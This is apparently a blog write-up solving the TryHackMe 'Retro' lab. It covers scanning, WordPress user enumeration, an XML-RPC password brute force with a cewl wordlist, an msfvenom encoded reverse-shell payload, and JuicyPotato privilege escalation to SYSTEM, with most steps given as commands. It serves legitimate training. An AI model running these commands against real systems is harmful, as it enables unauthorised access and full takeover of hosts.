TryHackMe: Retro Writeup

Hello everyone, today I will share a write-up on how to solve the Retro machine from TryHackMe. Retro is rated as Hard on TryHackMe, but believe me, it is not that hard. Although there are already many write-ups on this machine, I hope there are some new methodologies that we can learn from this post.

Port Scanning

The first thing to do in pentesting or boot-to-root CTF is network enumeration, specifically port scanning, to enumerate all open ports and services running on those ports. I am using rustscan for detecting open port.

rustscan -a
nmap -p80,3389 -sVC

We found an HTTP server running on port 80. Let's dive in.

Directory Scanning

feroxbuster -u

Based on directory scanning, we found installed WordPress at /retro/ page.

Let's enumerate using WPScan.

wpscan --url --force --enumerate u

Okay, so we found that XML-RPC is enabled, which makes it possible to perform brute force attacks without getting locked out. Additionally, we found a valid username through enumeration: wade.


Before performing a dictionary attack against the user wade, we can create custom wordlists using cewl.

cewl --depth 2 --min_word_length 4 --write wl.txt

And then, we can perform dictionary attack using our created custom wordlists.

wpscan --url --force --usernames wade --passwords wl.txt --max-threads 100

We found valid credentials from wpscan result.

We are in!

Shell as Local Service User

Once you have access to the WordPress admin, gaining shell access to the system is quite easy. There are several ways to do this, one of which is injecting malicious code through the Theme Editor.



Let's create more stable shell.

msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=4443 -f exe -e x86/shikata_ga_nai -o reverse-shell.exe

Upload to target, and then run the file to get shell.

Let's check our target system.

We have a service user with SeImpersonatePrivilege, and the system is running Microsoft Windows Server 2016 Standard. We can use Juicy Potato to gain a SYSTEM shell on the target.

Shell as SYSTEM

Upload JuicyPotato.exe to the target, prepare your listener, and run the exploit.

JuicyPotato.exe -l 6666 -p C:\inetpub\wwwroot\retro\wp-content\themes\twentysixteen\rev.exe -t * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}

{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} is the CLSID, if above not working, you can try from this lists:

Windows Server 2016 Standard

Our listener should receive a shell as NT AUTHORITY\SYSTEM.

Okay, thanks for reading. Hope you learned something new today, and happy hacking.


These are some tools I mentioned in this article:
THM Room:

Posting Komentar untuk "TryHackMe: Retro Writeup"